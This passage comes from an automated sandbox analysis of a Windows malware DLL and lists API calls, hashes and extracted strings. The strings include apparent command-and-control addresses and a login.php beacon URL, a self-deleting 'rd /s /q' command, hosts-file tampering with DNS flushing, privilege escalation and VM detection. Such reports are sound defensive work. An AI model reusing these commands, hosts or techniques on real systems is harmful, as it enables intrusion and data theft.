                                      • CreateThread.KERNEL32(00000000,00000000,10009520,107.163.241.193:6520,00000000,00000000), ref: 1000BC72
                                      • CreateThread.KERNEL32(00000000,00000000,1000B700,00000000,00000000,00000000), ref: 1000BC83
                                      • Sleep.KERNEL32(00000BB8), ref: 1000BC8A
                                      • CreateThread.KERNEL32(00000000,00000000,10009C70,00000000,00000000,00000000), ref: 1000BCCA
                                      • CreateThread.KERNEL32(00000000,00000000,1000B7C0,00000000,00000000,00000000), ref: 1000BCDB
                                      • Sleep.KERNEL32(00000BB8), ref: 1000BCE2
                                      • CreateThread.KERNEL32(00000000,00000000,10005E10,00000000,00000000,00000000), ref: 1000BCF3
                                      • CreateThread.KERNEL32(00000000,00000000,100099B0,00000000,00000000,00000000), ref: 1000BD04
                                      • Sleep.KERNEL32(000927C0), ref: 1000BD0B
                                      • Sleep.KERNEL32(000927C0), ref: 1000BD1B
                                      • CreateThread.KERNEL32(00000000,00000000,10009450,00000000,00000000,00000000), ref: 1000BD2C
                                      • Sleep.KERNEL32(0000EA60), ref: 1000BD33
                                        • Part of subcall function 10005870: LoadLibraryA.KERNEL32 ref: 1000588A
                                        • Part of subcall function 10005870: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 1000589A
                                        • Part of subcall function 10005870: GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100058B1
                                      • CreateThread.KERNEL32(00000000,00000000,1000BA00,00000000,00000000,00000000), ref: 1000BD44
                                      • Sleep.KERNEL32(000000FF), ref: 1000BD48
                                        • Part of subcall function 100056F0: StrStrIA.SHLWAPI(?,cmd.exe,774D0F00,?,00000000), ref: 10005706
                                      • wsprintfA.USER32 ref: 1000BD75
                                      • Sleep.KERNEL32(000007D0), ref: 1000BD9B
                                      • DeleteFileA.KERNEL32(?), ref: 1000BDA2
                                        • Part of subcall function 10005620: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 1000562A
                                        • Part of subcall function 10005620: OpenProcessToken.ADVAPI32(00000000), ref: 10005631
                                        • Part of subcall function 10005620: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10005647
                                        • Part of subcall function 10005620: AdjustTokenPrivileges.KERNELBASE ref: 1000568A
                                        • Part of subcall function 10005620: CloseHandle.KERNEL32 ref: 10005695
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Create$SleepThread$wsprintf$File$DeleteDirectoryModuleNameProcessToken$AddressAdjustCloseCurrentD262ErrorExtendedHandleLastLibraryLoadLookupMutexOpenPathPrivilegePrivilegesProcStartupTableValuestrrchr
                                      • String ID: 107.163.241.193:6520$123$C:\Users\user\Desktop$C:\Users\user\Desktop\11121541$M107.163.241.193:6520$SeDebugPrivilege$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"
                                      • API String ID: 2415948166-2841148663
                                      • Opcode ID: 018e1f2a6cdc16a32f09860ae9f822d303fb44d8efb97839f19e393dd835906d
                                      • Instruction ID: 7ac460b640bc8df6dd4afea00a726a4ab02921dc9a65f5646ed82dd80945aab9
                                      • Opcode Fuzzy Hash: 018e1f2a6cdc16a32f09860ae9f822d303fb44d8efb97839f19e393dd835906d
                                      • Instruction Fuzzy Hash: 6D518E70B8475476F230EB608C4BF8A7A50DB44F91F204519F7497E1D5DBF0B1548AAB

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
                                      • String ID: http://
                                      • API String ID: 2221484516-1121587658
                                      • Opcode ID: 44d22dc169835b13d51071f1eb418a582025dad4709cce38a998946081ae1d9a
                                      • Instruction ID: bc3784d7d81ef269009f725925b13efc19acb8278c31ba2a6c6e4a5a612b11a5
                                      • Opcode Fuzzy Hash: 44d22dc169835b13d51071f1eb418a582025dad4709cce38a998946081ae1d9a
                                      • Instruction Fuzzy Hash: 6351C3712043456BE320DB34CC85BEBB7D9FF88350F404A29FA9997281DB79D61886A2

                                      Control-flow Graph

                                      APIs
                                      • wsprintfA.USER32 ref: 10008093
                                      • 6D262DD0.MFC42(0007D000), ref: 1000809E
                                        • Part of subcall function 100050E0: InternetOpenA.WININET(?,?,?,?,?), ref: 100050F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262InternetOpenwsprintf
                                      • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
                                      • API String ID: 2627167135-1204782975
                                      • Opcode ID: dfd9a203dac871dcf9b230ba8f9e42176b09cbb43efbcb095429f1359e1ec5f6
                                      • Instruction ID: 0dc96db265ef937b0d0fa70f15691eb36084b8502b1a1f786cdd5324ccd44853
                                      • Opcode Fuzzy Hash: dfd9a203dac871dcf9b230ba8f9e42176b09cbb43efbcb095429f1359e1ec5f6
                                      • Instruction Fuzzy Hash: DCD15A76A002446FEB14CFA8CC85BFEBBA5FB44290F10426EF95997681DA729E01C791

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,774D0F00,?,?,10005746,00000000,self,?,00000000), ref: 100054BC
                                      • strrchr.MSVCRT ref: 100054C9
                                      • CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000,?,00000000), ref: 10005522
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000), ref: 10005538
                                      • time.MSVCRT(00000000,?,00000000), ref: 1000553F
                                      • _localtime32.MSVCRT(?,?,00000000), ref: 1000554E
                                      • strftime.MSVCRT ref: 10005561
                                      • vsprintf.MSVCRT ref: 100055B3
                                      • sprintf.MSVCRT ref: 100055D3
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100055FD
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10005604
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
                                      • String ID: %s%s$log.txt
                                      • API String ID: 2392943451-1489102009
                                      • Opcode ID: 52cdcfc05b5e2a2109bc0a018a5dd34bdfef92a37fde07e32da0d56ab52059b9
                                      • Instruction ID: b92b12cda10bb2cd97a7de79ac6255796b6fed7ae908d87d16a6086495e58579
                                      • Opcode Fuzzy Hash: 52cdcfc05b5e2a2109bc0a018a5dd34bdfef92a37fde07e32da0d56ab52059b9
                                      • Instruction Fuzzy Hash: 4241D5B1148344AFE328CB74CC999EB77A9EBC8351F404A2DF75A872D0DBB59908C651

                                      Control-flow Graph

                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B80A
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B819
                                      • 6D262DD0.MFC42(00080000,XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 1000B88D
                                      • Sleep.KERNEL32(000927C0), ref: 1000B942
                                      • wsprintfA.USER32 ref: 1000B9C7
                                      • Sleep.KERNEL32(000927C0), ref: 1000B9F5
                                      Strings
                                      • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B81B
                                      • cmd.exe /c ipconfig /flushdns, xrefs: 1000B9E4
                                      • 127.0.0.1, xrefs: 1000B9D5
                                      • http://107.163.241.186:12354/login.php, xrefs: 1000B8FB
                                      • 8.8.8.8, xrefs: 1000B9D0
                                      • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B836
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: DirectorySleepSystem$D262wsprintf
                                      • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.186:12354/login.php
                                      • API String ID: 1478259680-42274971
                                      • Opcode ID: 8e9196231dcfb8476761a53707d50ac412fe7b967630b0d11d4226dfc570b8ce
                                      • Instruction ID: 5bded651d412340725d0a4c63ae39483ba610a665616dbfa0bfcbea02e9b2bc5
                                      • Opcode Fuzzy Hash: 8e9196231dcfb8476761a53707d50ac412fe7b967630b0d11d4226dfc570b8ce
                                      • Instruction Fuzzy Hash: 25516E71514A486BE364CA34CCA1BEB3BC6EB953A0F104A3DF786872D5ED71D948C292

                                      APIs
                                      • 6D262DD0.MFC42(00001218), ref: 1000945F
                                      • WSAStartup.WS2_32(00000202,?), ref: 10009473
                                        • Part of subcall function 10005080: CreateMutexA.KERNEL32(?,?,?,10009555), ref: 1000508F
                                      • GetLastError.KERNEL32 ref: 1000948C
                                      • CloseHandle.KERNEL32(00000000), ref: 100094FE
                                        • Part of subcall function 10008030: wsprintfA.USER32 ref: 10008093
                                        • Part of subcall function 10008030: 6D262DD0.MFC42(0007D000), ref: 1000809E
                                      • Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 100094C0
                                      • CreateThread.KERNEL32 ref: 100094DC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 100094E7
                                      • CloseHandle.KERNEL32(00000000), ref: 100094EE
                                      • Sleep.KERNEL32(0002BF20), ref: 100094F9
                                      Similarity
                                      • API ID: CloseCreateD262HandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
                                      • String ID: 0x5d65r455f$5655029807
                                      • API String ID: 3959575285-1179119988
                                      • Opcode ID: 578a8b3bfa932a769acf868f9e4ec53adfd9d175f8e518d4df08ae5bf0750ec9
                                      • Instruction ID: 5e1dba5c7bc71828a1d61e85a2d88ef44d6a5280b45a2a65baa4fdc2c608d569
                                      • Opcode Fuzzy Hash: 578a8b3bfa932a769acf868f9e4ec53adfd9d175f8e518d4df08ae5bf0750ec9
                                      • Instruction Fuzzy Hash: C411F5B66402247BF750D7A49C8FFEB3648DB48795F004234FF08991C6DB75992582A7

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,100199D8), ref: 1000777F
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007839
                                      • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,100199D8), ref: 10007892
                                        • Part of subcall function 10005360: RegQueryValueExA.KERNEL32(?,?,?,?,?,00000000,100077BC), ref: 1000537E
                                        • Part of subcall function 10005350: RegCloseKey.KERNEL32(100199D8,100077C6,?), ref: 10005355
                                      Similarity
                                      • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
                                      • String ID: %u MB$11121541$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.186:12354/login.php
                                      • API String ID: 2543995030-3015006635
                                      • Opcode ID: fc7d72a152619b582a3fefedd51e004960f2eda1014b792e2f96d369dc7e128d
                                      • Instruction ID: c5dd48205e3bca1180acbc7f94ac086bba4f0d0af77615eae8fb4fb729731d8a
                                      • Opcode Fuzzy Hash: fc7d72a152619b582a3fefedd51e004960f2eda1014b792e2f96d369dc7e128d
                                      • Instruction Fuzzy Hash: 854117766042005BE718CA38CC45BAB77D5FBC8350F944A2CFA59CB2C5EE78EA09C791

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA67
                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA9D
                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 1000BB0C
                                      • StrStrIA.SHLWAPI(00000000,svchsot.exe), ref: 1000BB1E
                                      • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 1000BB35
                                      • RegCloseKey.ADVAPI32(00000000), ref: 1000BB4D
                                      • Sleep.KERNEL32(000493E0), ref: 1000BB58
                                      Strings
                                      • svchsot.exe, xrefs: 1000BB18
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA5D
                                      Similarity
                                      • API ID: Value$CloseDeleteEnumInfoOpenQuerySleep
                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
                                      • API String ID: 2160694657-2172464104
                                      • Opcode ID: 4e27199c7ad9a2771cfa9659ddadbab6851e6264533792b6733e40e2567ba759
                                      • Instruction ID: 9cde71c0bbbc315761c064880cf2f3fcda6eb6ddb1b00218362d2001d0698cab
                                      • Opcode Fuzzy Hash: 4e27199c7ad9a2771cfa9659ddadbab6851e6264533792b6733e40e2567ba759
                                      • Instruction Fuzzy Hash: 9C311E71205341ABE315CF55CD84FABB7E9FBC8B44F404A2DF28596245D770EA05CBA2

                                      Similarity
                                      • API ID: Netbios
                                      • String ID: %02X%02X%02X%02X%02X%02X$2$3
                                      • API String ID: 544444789-1505804699
                                      • Opcode ID: af20756df40ebd6339beb114ddc91ef19d7f3563555a5a83e0a027d6d8b1a0ce
                                      • Instruction ID: ce6d5c193f772186174b1e4aad9d2ff49001eec6116d7ace393251796c525a04
                                      • Opcode Fuzzy Hash: af20756df40ebd6339beb114ddc91ef19d7f3563555a5a83e0a027d6d8b1a0ce
                                      • Instruction Fuzzy Hash: 1E41B0321187869BD725CA18C8407FBB7D5EFC4350F04487DB5D48B682EAB9E609C793

                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 10009534
                                        • Part of subcall function 10005080: CreateMutexA.KERNEL32(?,?,?,10009555), ref: 1000508F
                                      • GetLastError.KERNEL32 ref: 1000955A
                                      • CreateThread.KERNEL32(00000000,00000000,100091C0,?,00000000,00000000), ref: 10009580
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009587
                                      • CloseHandle.KERNEL32(00000000), ref: 1000958A
                                      • Sleep.KERNEL32(00002710), ref: 10009595
                                      • CloseHandle.KERNEL32(00000000), ref: 1000959E
                                      Similarity
                                      • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
                                      • String ID:
                                      • API String ID: 3243752880-0
                                      • Opcode ID: 17ecd922373021ccc26ed0776112388b15e0fc03dd09d5e994e296d1f773db05
                                      • Instruction ID: f421bb569ff3a6cc1cd0ae4f97cefabef7536e0662718203c2adf22941bcd44e
                                      • Opcode Fuzzy Hash: 17ecd922373021ccc26ed0776112388b15e0fc03dd09d5e994e296d1f773db05
                                      • Instruction Fuzzy Hash: C0012875244220BBF62197618C4EFDF3B28EB8D791F500220FB18961C2C775A914C3B6
                                      Strings
                                      • http://107.163.241.186:12354/login.php, xrefs: 10009CE3
                                      Similarity
                                      • API ID: Sleep$D262wsprintf
                                      • String ID: http://107.163.241.186:12354/login.php
                                      • API String ID: 1791923907-2223919147
                                      • Opcode ID: 694391d3b39d992574a20db0da015c0f38dc4f3f9208cd7deb46858057425b11
                                      • Instruction ID: 96d5f2fb8650a78ccf418842dd4e97db4fe2b4609ab24aaa4029efad7a9bdec8
                                      • Opcode Fuzzy Hash: 694391d3b39d992574a20db0da015c0f38dc4f3f9208cd7deb46858057425b11
                                      • Instruction Fuzzy Hash: 07318D319446956BF320CA34CC62BDB37D9EB463D0F114A2DF78587185EA36E848C293
                                      Similarity
                                      • API ID: _inittermfreemalloc
                                      • String ID:
                                      • API String ID: 1678931842-0
                                      • Opcode ID: 89a88f4e84c4b1e58b0e9ea1bbdff44fa1b2eeffde783faa751c3280ef985327
                                      • Instruction ID: a3f3e8324c5b3e50e68b642cab27e3164d803a3a377d102eee1bb53c49589baa
                                      • Opcode Fuzzy Hash: 89a88f4e84c4b1e58b0e9ea1bbdff44fa1b2eeffde783faa751c3280ef985327
                                      • Instruction Fuzzy Hash: 8E11FA32645226AFF72CCBA8EE94E9977E5EB08391B118019E901CB160E735E8908B54
                                      APIs
                                      • GetProcAddress.KERNEL32(6EBC0000,00000000), ref: 10002D64
                                      Strings
                                      • TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002D50
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: TmV0TG9jYWxHcm91cEVudW0=
                                      • API String ID: 190572456-980335172
                                      • Opcode ID: 3f2d0679c1c961da4bf78d4d4b53a185f0cc3ff58a33cb7d87503068401a1db2
                                      • Instruction ID: 426e6b0573956a2a964d800dfb9f5cedc638600491c3979137d1d50aff8110e9
                                      • Opcode Fuzzy Hash: 3f2d0679c1c961da4bf78d4d4b53a185f0cc3ff58a33cb7d87503068401a1db2
                                      • Instruction Fuzzy Hash: A1C08CF48002205BF641CB648C88B0932A8E30C28AB008010F50DD222AD630E2848721
                                      APIs
                                      • GetProcAddress.KERNEL32(6EBC0000,00000000), ref: 10002E24
                                      Strings
                                      • TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002E10
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: TmV0QXBpQnVmZmVyRnJlZQ==
                                      • API String ID: 190572456-3244026974
                                      • Opcode ID: 3fadc47ae94f51a42844ab3558ef58d288ba066830200869926fcfa67396abfa
                                      • Instruction ID: 2fae8953d5955be7595a5657c67f85d266c220fedc191ac5fad8892b6c7ec77a
                                      • Opcode Fuzzy Hash: 3fadc47ae94f51a42844ab3558ef58d288ba066830200869926fcfa67396abfa
                                      • Instruction Fuzzy Hash: 45C08CF88002505BF681CBA0CC88B0632A9E30C28A7008024F849C221BD634E2E48721
                                      APIs
                                        • Part of subcall function 1000B3C0: lstrcpy.KERNEL32(00000000,?), ref: 1000B3F4
                                        • Part of subcall function 1000B3C0: lstrcat.KERNEL32(00000000,10019C10), ref: 1000B40D
                                        • Part of subcall function 1000B3C0: lstrcat.KERNEL32(00000000,*.*), ref: 1000B41C
                                        • Part of subcall function 1000B3C0: FindFirstFileA.KERNEL32(00000000,?), ref: 1000B42E
                                      • Sleep.KERNEL32(0036EE80), ref: 1000B7A6
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstSleeplstrcpy
                                      • String ID: C:\Program Files
                                      • API String ID: 187370985-1387799010
                                      • Opcode ID: c210b9063764c7f6096e7048406087fc1d266cba2aab8d6c671f5bab15b8f448
                                      • Instruction ID: 34d684334c7274c303d5a2eab8ad17a067ee82296af27424734a78a44ff59643
                                      • Opcode Fuzzy Hash: c210b9063764c7f6096e7048406087fc1d266cba2aab8d6c671f5bab15b8f448
                                      • Instruction Fuzzy Hash: A2115E789097598BF304DF6998C154BBBE0FB85784F108929F88983316EB71DA498BD2
                                      APIs
                                      • RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 1000533D
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 797ccceb2a6220eaf1b4da9278694c3052d15d15b886ab40c5ba1907cad651cd
                                      • Instruction ID: f0b58f1054efd69a3b3c561961df13c78b53d0028abc68edc269c93d18d29df8
                                      • Opcode Fuzzy Hash: 797ccceb2a6220eaf1b4da9278694c3052d15d15b886ab40c5ba1907cad651cd
                                      • Instruction Fuzzy Hash: 23E00AB5218601AF9604CF49C994D1BB3F9ABCC700F10CA0CB599C3254D630E806CB62
                                      APIs
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000511E
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: 79fb8dd1e416200e2006b02a81ba11ca3d168ec2f8ff613b71efe962d633b550
                                      • Instruction ID: b03028c7f8be2f45730d069a64a3eb3b23702ea1336b4465e57dd578e4720c79
                                      • Opcode Fuzzy Hash: 79fb8dd1e416200e2006b02a81ba11ca3d168ec2f8ff613b71efe962d633b550
                                      • Instruction Fuzzy Hash: 91D0BCB5618342AFD708CF58D994D3BB7E9BBC8600F188D0CB59583254D730E849CB62
                                      APIs
                                      • RegQueryValueExA.KERNEL32(?,?,?,?,?,00000000,100077BC), ref: 1000537E
                                      Similarity
                                      • API ID: QueryValue
                                      • String ID:
                                      • API String ID: 3660427363-0
                                      APIs
                                      • RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 100053CE
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      APIs
                                      Similarity
                                      • API ID: D262
                                      • String ID:
                                      • API String ID: 1394008445-0
                                      APIs
                                      • InternetOpenA.WININET(?,?,?,?,?), ref: 100050F9
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(?,?,?,000F003F,00000000,10005862,80000000,00000000,00000000,000F003F,?,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,?,1000BD12), ref: 100053A9
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      APIs
                                      • CreateMutexA.KERNEL32(?,?,?,10009555), ref: 1000508F
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      APIs
                                      • GetShortPathNameA.KERNEL32(?,?,?), ref: 1000526F
                                      Similarity
                                      • API ID: NamePathShort
                                      • String ID:
                                      • API String ID: 1295925010-0
                                      APIs
                                      • Process32First.KERNEL32(?,?), ref: 1000540A
                                      Similarity
                                      • API ID: FirstProcess32
                                      • String ID:
                                      • API String ID: 2623510744-0
                                      APIs
                                      • Process32Next.KERNEL32(?,?), ref: 1000542A
                                      Similarity
                                      • API ID: NextProcess32
                                      • String ID:
                                      • API String ID: 1850201408-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(04603060), ref: 10001CA6
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(04601050), ref: 10001D06
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(02E4D020), ref: 10001D66
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(02E4A008), ref: 10001DF6
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(02E44FE0), ref: 10001EE6
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      APIs
                                      • gethostbyname.WS2_32(100199D8), ref: 10005055
                                      Similarity
                                      • API ID: gethostbyname
                                      • String ID:
                                      • API String ID: 930432418-0
                                      APIs
                                      • PathFileExistsA.SHLWAPI(774C8A60,100075DB,?,?,%s\lang.ini,C:\Users\user\Desktop), ref: 10005185
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID:
                                      • API String ID: 1174141254-0
                                      APIs
                                      • GetDriveTypeA.KERNEL32(10019C34,1000B786,10019C34), ref: 10005285
                                      Similarity
                                      • API ID: DriveType
                                      • String ID:
                                      • API String ID: 338552980-0
                                      • Opcode ID: 87301e1af61e2e41f1f6383ad11ae2e1a279f747f4b669202c44d7fdfc61eaef
                                      • Instruction ID: a0a788f3a0a4ab41634461f5791a3083b2ff699e0ce9ca5fdf73c56e4fc6de61
                                      • Opcode Fuzzy Hash: 87301e1af61e2e41f1f6383ad11ae2e1a279f747f4b669202c44d7fdfc61eaef
                                      • Instruction Fuzzy Hash: C0A00275D08610ABDF00DBF4CA8C81A77F9AB89741B40C844F155D2110C634D840DF11
                                      APIs
                                      • RegCloseKey.KERNEL32(100199D8,100077C6,?), ref: 10005355
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 789b69af8a6c9098e4647c1b3afcf07e56411a0a888967a2e99320c4219e37c5
                                      • Instruction ID: 9a5c7de402fddbdbfe160585b93185f668ef75bcfd4763a99ab0458e81967846
                                      • Opcode Fuzzy Hash: 789b69af8a6c9098e4647c1b3afcf07e56411a0a888967a2e99320c4219e37c5
                                      • Instruction Fuzzy Hash: 02A002B5A08610AFDF00DBA5CB8C80A7BF9AB85701B008844F149C2011C678D840DB11
                                      APIs
                                      • CoInitializeEx.COMBASE(00000000,00000000), ref: 1000627D
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000628E
                                      • CoCreateInstance.COMBASE(Function_000141D0,00000000,00000001,10014100,10019B34), ref: 100062AE
                                      • 6D262DD0.MFC42(0000000C), ref: 100062BA
                                      • SysAllocString.OLEAUT32(?), ref: 100062E1
                                      • CoSetProxyBlanket.COMBASE(6C0BC1CB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 10006368
                                      • wcscat.MSVCRT ref: 100063A3
                                      • 6D262DD0.MFC42(0000000C), ref: 100063AB
                                      • SysAllocString.OLEAUT32(iguration.Index=), ref: 100063D3
                                      • 6D262DD0.MFC42(0000000C), ref: 1000642F
                                      • VariantInit.OLEAUT32(ultIPGateway), ref: 10006512
                                      • VariantInit.OLEAUT32(SetGateways), ref: 10006519
                                      • VariantInit.OLEAUT32(tworkAdapterConfiguration.Index=), ref: 10006520
                                      • 6D262DD0.MFC42(0000000C), ref: 10006596
                                      • SysAllocString.OLEAUT32(79617765), ref: 100065BE
